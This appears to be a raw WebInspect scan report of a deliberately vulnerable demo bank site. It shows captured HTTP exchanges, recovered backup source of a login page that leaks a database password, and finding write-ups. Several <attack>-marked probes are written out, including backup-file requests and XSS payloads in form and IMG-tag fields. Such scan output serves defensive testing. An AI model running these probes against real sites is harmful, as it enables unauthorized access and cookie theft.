Response.Write " <TD STYLE='border-top: 7px solid #2E7AA3' WIDTH='571' HEIGHT='47' "
Response.Write " VALIGN='TOP'> </TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD WIDTH='571' VALIGN='TOP' ROWSPAN='7' HEIGHT='49'> "
Response.Write " <TABLE> "
Response.Write " <TR> "
Response.Write " <TD BGCOLOR='#2E7AA3' STYLE='border: 1px solid black' WIDTH='258' "
Response.Write " HEIGHT='217'> "
Response.Write " <FORM ACTION='login.asp' METHOD='post'> "
Response.Write " <CENTER>Invalid Login: " & sName & "<br>Please try again<br>" & "Username:<BR><INPUT TYPE='text' NAME='txtName' "
Response.Write " STYLE='border: 1px solid black; spacing: 0'><BR>Password:<BR><INPUT TYPE='password' "
Response.Write " NAME='txtPassPhrase' STYLE='border: 1px solid black; spacing: 0'><BR><INPUT "
Response.Write " TYPE='radio' NAME='graphicOption' VALUE='minimum' CHECKED='CHECKED'><FONT "
Response.Write " SIZE='-1'>Minimum Graphics</FONT><BR><INPUT TYPE='radio' NAME='graphicOption' "
Response.Write " VALUE='standard'><FONT SIZE='-1'>Standard Graphics</FONT><BR><BR><INPUT "
Response.Write " TYPE='submit' STYLE='border: 1px solid black' "
Response.Write " VALUE=' Access Accounts '><BR></CENTER></FORM></TD> "
Response.Write " <TD STYLE='border: 1px solid black' WIDTH='304' HEIGHT='217' "
Response.Write " ROWSPAN='2'><IMG SRC='/images/lock.gif' WIDTH='304' HEIGHT='266' "
Response.Write " BORDER='0'></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD BGCOLOR='ffffff' STYLE='border: 1px solid black' WIDTH='258' HEIGHT='241' "
Response.Write " VALIGN='TOP'><FONT SIZE='-2'>We are confident of our system's ability to "
Response.Write " protect all transactions; however, this is not an invitation for people to "
Response.Write " attempt unauthorized access to the system. This is a private computing system "
Response.Write " which is restricted to authorized individuals. Actual or attempted unauthorized "
Response.Write " use of this computer system may result in criminal and/or civil prosecution. We "
Response.Write " reserve the right to view, monitor, and record activity on the system without "
Response.Write " notice or permission. Any information obtained by monitoring, reviewing, or "
Response.Write " recording is subject to review by law enforcement organizations in connection "
Response.Write " with the investigation or prosecution of possible criminal activity on the "
Response.Write " system. If you are not an authorized user of this system or do not consent to "
Response.Write " continued monitoring, exit the system at this time. </FONT></TD> "
Response.Write " </TR> "
Response.Write " </TABLE></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162'><IMG "
Response.Write " SRC='/images/customer-login.gif' ALIGN='LEFT' HEIGHT='20' "
Response.Write " BORDER='0'></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162'><A "
Response.Write " HREF='/pindex.asp'><IMG SRC='/images/financial-planning.gif' ALIGN='LEFT' "
Response.Write " BORDER='0' WIDTH='150' HEIGHT='20'></A></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162' "
Response.Write " HEIGHT='19'><IMG SRC='/images/services.gif' ALIGN='LEFT' HEIGHT='20' "
Response.Write " BORDER='0'></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162' "
Response.Write " HEIGHT='24'><IMG SRC='/images/your-accounts.gif' ALIGN='LEFT' HEIGHT='20' "
Response.Write " BORDER='0'></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162'><IMG "
Response.Write " SRC='/images/customer-support.gif' ALIGN='LEFT' HEIGHT='20' "
Response.Write " BORDER='0'></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border-left: 12px solid #2E7AA3' WIDTH='162' "
Response.Write " ALIGN='CENTER'> "
Response.Write " <FORM ACTION='pformresults.asp' METHOD='post'> "
Response.Write " <P><FONT SIZE='-1' FACE='Arial'> Register for an Interest Checking "
Response.Write " Account with FreeBank:</FONT></P> "
Response.Write " <P><FONT SIZE='-1' FACE='Arial'>First Name:</FONT><INPUT "
Response.Write " TYPE='text' NAME='txtFirstName' "
Response.Write " STYLE='border: 1px solid black; spacing: 0'><BR><FONT SIZE='-1' "
Response.Write " FACE='Arial'>Last Name:</FONT><INPUT TYPE='text' NAME='txtLastName' "
Response.Write " STYLE='border: 1px solid black; spacing: 0'><BR> "
Response.Write " <INPUT TYPE='hidden' NAME='txtHidden' VALUE='This was hidden from the user'> "
Response.Write " <INPUT TYPE='hidden' NAME='dbConnectString' "
Response.Write " VALUE='dbCCNumbers;uid=sa;password=scoobydo'> "
Response.Write " <INPUT TYPE='submit' STYLE='border: 1px solid black' "
Response.Write " VALUE='Register'></P></FORM></TD> "
Response.Write " </TR> "
Response.Write " </TABLE> "
' "
end if
%>
</body>
</html>
Backup File (Appended .bak)A backup file with the extension .bak was found on the server. Often, old files are renamed with such an extension to distinguish them from production files. However, the source code for old files that have been renamed in this manner and left in the webroot can often be retrieved.GET /login.asp<attack>.bak</attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
200 |Content-Type:\stext/plain |Content-Type:\sapplication/octet-stream GET /login.asp.bak HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:51:33 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 05:45:31 GMT
ETag: "96256f86badc11:8f6"
Content-Length: 14611
<%
dim sName, sPassPhrase
sName=Request("txtName")
sPassPhrase=Request("txtPassPhrase")
%>
<html>
<body>
<%
if lcase(sName)="root" then
Response.Write "Hello " & sName & "<br>Welcome back"
elseif lcase(sName)="/etc/passwd" then
Response.Write "root:x:0:0::/root:/bin/sh"
Response.Write "dsmith:x:516:522::/home/dsmith:/bin/false"
Response.Write "etaylor:x:517:523::/home/etaylor:/bin/false"
Response.Write "scooby:x:518:524::/home/scooby-doo:/bin/false"
Response.Write "pshaggy:x:519:526::/home/pshaggy:/bin/false"
Response.Write "dtomson:x:520:527::/home/dtomson:/bin/false"
Response.Write "jsmith:x:521:528::/home/jsmith:/bin/false"
elseif lcase(sName)="/boot.ini" then
Response.Write "[boot loader]"
Response.Write "timeout=30"
Response.Write "default=multi(0)disk(0)rdisk(0)partition(3)\WINNT"
Response.Write "[operating systems]"
Response.Write "multi(0)disk(0)rdisk(0)partition(3)\WINNT=""Microsoft Windows 2000 Server"" /fastdetect"
Response.Write "multi(0)disk(0)rdisk(0)partition(2)\WINNT=""Microsoft Windows 2000 Professional"" /fastdetect"
elseif lcase(sName)="*" then
Response.Write "An error has occurred"
elseif lcase(sName)=";" then
Response.Write "NON-HTML ERROR"
else
Response.Write " <TABLE BGCOLOR='#ffffff' STYLE='border: 3px solid black'> "
Response.Write " <TR> "
Response.Write " <TD "
Response.Write " STYLE='border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3' "
Response.Write " HEIGHT='47' ROWSPAN='2' VALIGN='TOP'><IMG "
Response.Write " SRC='/images/freebank-logo2.gif' ALIGN='LEFT' BORDER='0' WIDTH='150' "
Response.Write " HEIGHT='50'><BR><BR></TD> "
Response.Write " <TD STYLE='border-top: 7px solid #2E7AA3' WIDTH='571' HEIGHT='47' "
Response.Write " VALIGN='TOP'> </TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD WIDTH='571' VALIGN='TOP' ROWSPAN='7' HEIGHT='49'> "
Response.Write " <TABLE> "
Response.Write " <TR> "
Response.Write " <TD BGCOLOR='#2E7AA3' STYLE='border: 1px solid black' WIDTH='258' "
Response.Write " HEIGHT='217'> "
Response.Write " <FORM ACTION='login.asp' METHOD='post'> "
Response.Write " <CENTER>Invalid Login: " & sName & "<br>Please try again<br>" & "Username:<BR><INPUT TYPE='text' NAME='txtName' "
Response.Write " STYLE='border: 1px solid black; spacing: 0'><BR>Password:<BR><INPUT TYPE='password' "
Response.Write " NAME='txtPassPhrase' STYLE='border: 1px solid black; spacing: 0'><BR><INPUT "
Response.Write " TYPE='radio' NAME='graphicOption' VALUE='minimum' CHECKED='CHECKED'><FONT "
Response.Write " SIZE='-1'>Minimum Graphics</FONT><BR><INPUT TYPE='radio' NAME='graphicOption' "
Response.Write " VALUE='standard'><FONT SIZE='-1'>Standard Graphics</FONT><BR><BR><INPUT "
Response.Write " TYPE='submit' STYLE='border: 1px solid black' "
Response.Write " VALUE=' Access Accounts '><BR></CENTER></FORM></TD> "
Response.Write " <TD STYLE='border: 1px solid black' WIDTH='304' HEIGHT='217' "
Response.Write " ROWSPAN='2'><IMG SRC='/images/lock.gif' WIDTH='304' HEIGHT='266' "
Response.Write " BORDER='0'></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD BGCOLOR='ffffff' STYLE='border: 1px solid black' WIDTH='258' HEIGHT='241' "
Response.Write " VALIGN='TOP'><FONT SIZE='-2'>We are confident of our system's ability to "
Response.Write " protect all transactions; however, this is not an invitation for people to "
Response.Write " attempt unauthorized access to the system. This is a private computing system "
Response.Write " which is restricted to authorized individuals. Actual or attempted unauthorized "
Response.Write " use of this computer system may result in criminal and/or civil prosecution. We "
Response.Write " reserve the right to view, monitor, and record activity on the system without "
Response.Write " notice or permission. Any information obtained by monitoring, reviewing, or "
Response.Write " recording is subject to review by law enforcement organizations in connection "
Response.Write " with the investigation or prosecution of possible criminal activity on the "
Response.Write " system. If you are not an authorized user of this system or do not consent to "
Response.Write " continued monitoring, exit the system at this time. </FONT></TD> "
Response.Write " </TR> "
Response.Write " </TABLE></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162'><IMG "
Response.Write " SRC='/images/customer-login.gif' ALIGN='LEFT' HEIGHT='20' "
Response.Write " BORDER='0'></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162'><A "
Response.Write " HREF='/pindex.asp'><IMG SRC='/images/financial-planning.gif' ALIGN='LEFT' "
Response.Write " BORDER='0' WIDTH='150' HEIGHT='20'></A></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162' "
Response.Write " HEIGHT='19'><IMG SRC='/images/services.gif' ALIGN='LEFT' HEIGHT='20' "
Response.Write " BORDER='0'></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162' "
Response.Write " HEIGHT='24'><IMG SRC='/images/your-accounts.gif' ALIGN='LEFT' HEIGHT='20' "
Response.Write " BORDER='0'></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border: 2px solid #2E7AA3' WIDTH='162'><IMG "
Response.Write " SRC='/images/customer-support.gif' ALIGN='LEFT' HEIGHT='20' "
Response.Write " BORDER='0'></TD> "
Response.Write " </TR> "
Response.Write " <TR> "
Response.Write " <TD STYLE='border-left: 12px solid #2E7AA3' WIDTH='162' "
Response.Write " ALIGN='CENTER'> "
Response.Write " <FORM ACTION='pformresults.asp' METHOD='post'> "
Response.Write " <P><FONT SIZE='-1' FACE='Arial'> Register for an Interest Checking "
Response.Write " Account with FreeBank:</FONT></P> "
Response.Write " <P><FONT SIZE='-1' FACE='Arial'>First Name:</FONT><INPUT "
Response.Write " TYPE='text' NAME='txtFirstName' "
Response.Write " STYLE='border: 1px solid black; spacing: 0'><BR><FONT SIZE='-1' "
Response.Write " FACE='Arial'>Last Name:</FONT><INPUT TYPE='text' NAME='txtLastName' "
Response.Write " STYLE='border: 1px solid black; spacing: 0'><BR> "
Response.Write " <INPUT TYPE='hidden' NAME='txtHidden' VALUE='This was hidden from the user'> "
Response.Write " <INPUT TYPE='hidden' NAME='dbConnectString' "
Response.Write " VALUE='dbCCNumbers;uid=sa;password=scoobydo'> "
Response.Write " <INPUT TYPE='submit' STYLE='border: 1px solid black' "
Response.Write " VALUE='Register'></P></FORM></TD> "
Response.Write " </TR> "
Response.Write " </TABLE> "
' "
end if
%>
</body>
</html>
Application Error MessageA web application error message was found. An error message indicates that WebInspect has generated an unhandled exception in your web application code. Unhandled exceptions are circumstances in which the application has recieved user input that it did not expect and doesn't know how to deal with. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the system.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
error\shas\soccurred Or DB4Web\sClient\s-\sModul Not Generated\sby\sjavadocGET /admin/help.cgi.bak HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:35:16 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:46:59 GMT
ETag: "744b74f7a9dc11:8f6"
Content-Length: 31
<HTML></HTML>bleh exploit :0:0:Backup File (Appended .bak)A backup file with the extension .bak was found on the server. Often, old files are renamed with such an extension to distinguish them from production files. However, the source code for old files that have been renamed in this manner and left in the webroot can often be retrieved.GET /admin/help.cgi<attack>.bak</attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
200 |Content-Type:\stext/plain |Content-Type:\sapplication/octet-stream POST /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=1"style="background:url(javascript:alert('XSS'))"%20"HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:38:18 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 997
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was 1"style="background:url(javascript:alert('XSS'))" "<br>
Page was looking for a value in parameter called cboPage<br><br>
<h2>What follows is a dump of the HTTP stuff</h2>
<b>Form Variables Passed:</b><br>cboPage= 1"style="background:url(javascript:alert('XSS'))" "<br>
<b>QueryString variables passed:</b><br><pre>****** Head Data***
Client IP:199.72.29.34
Connection: Close
Host: zero.webappsecurity.com
Referer: http://zero.webappsecurity.com:80/pindex.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
****** End of Head Data*******</pre><br>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>"style="background:url\(javascript:alert\('XSS'\)\)GET /plink.asp?a=>"'><img%20src="javascript:alert('XSS')">&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 205
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = >"'><img src="javascript:alert('XSS')"></P>
<P>The parameter "c" = 12</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?a=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>&c=12 <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
javascript:alert\('XSS'\)">GET /user/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:37 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>Directory (user)<B>Found Directory:</B> /user/Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing Apache - Access Control</A>
<BR><BR><B>IIS:</B><BR><A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS Standard Permissions on Your Web Site</A>
<BR> <BR><B>Netscape:</B><BR><A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR><B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password-protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /test/test.html HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:42:07 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:06 GMT
ETag: "d81a92fba9dc11:8f6"
Content-Length: 296
<html>
<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<title> The Test Page </title>
</head>
<body>
<p> LOGIC CHECKS WORKED </p>
<A href="..\images\hi.asp">The welcome page</A><br>
<br>
<A href="..\errors\errors.log">Error logs</A>
</body>
</html>Test Application (test.html)A test script was located on the server. This type of file is usually left by a developer or web master to test a certain function of the web application or web server. Leaving test scripts available on the server is a very unsecure practice. The types of information that can be gleaned from test scripts include fixed authentication session IDs, usernames and passwords, locations or pointers to confidential areas of the web site, and proprietary source code. With this type of information available, an attacker can either use it to totally breach the security of the site or use it as a stepping stone to retrieve other sensitive data.GET /test/<attack>test.html</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
2\d\d |40[1]GET /_vti_txt/document.URL; HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_txt/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/_vti_txt/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
